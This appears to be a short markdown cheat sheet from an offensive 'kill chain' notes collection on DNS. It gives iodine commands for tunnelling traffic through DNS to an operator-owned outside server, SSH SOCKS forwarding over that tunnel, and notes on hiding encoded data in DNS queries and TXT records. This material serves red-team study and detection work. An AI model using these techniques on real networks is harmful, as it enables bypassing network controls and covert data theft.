killchain-compendium/exfiltration/dns/dns.md

DNS

• Root Servers
• Zones
• Records

Tunneling

• Tunnel IPv4 Data through DNS
• Start server on an outside DNS server. This may be a evs.

iodined -b 47110-f 10.0.0.1 tunnel.test.com

• Use client via

iodine -f -r <server-IP> tunnel.test.com

• NS record of the owned domain should contain the subdomain, e.g. tunnel.test.com
• Client gets a tunnel IP in the range of 10.0.0.0/8
• Check connection via

ping <server-IP>

• Generate ssh-key and put in on the server
• Dynamic port forwarding to server via

ssh <user>@10.0.0.1 -D 8080

• User proxy server on the client's web server like --proxy-server or use a SOCKS proxy like FoxyProxy

nslookup

nslookup type=txt <domain>

Reverse lookup

• Stored inside PTR record
• Reverse IP may look like <IP>.in-addr.arpa., but not via drill or dig

drill -x +short <IP>

Exfiltration

• Add data to UDP DNS requests
• Capture traffic on an owned DNS server
• 253 is the max length of a DNS name
• Encode the payload to hide it

Infiltration

• Inside TXT or any other possible records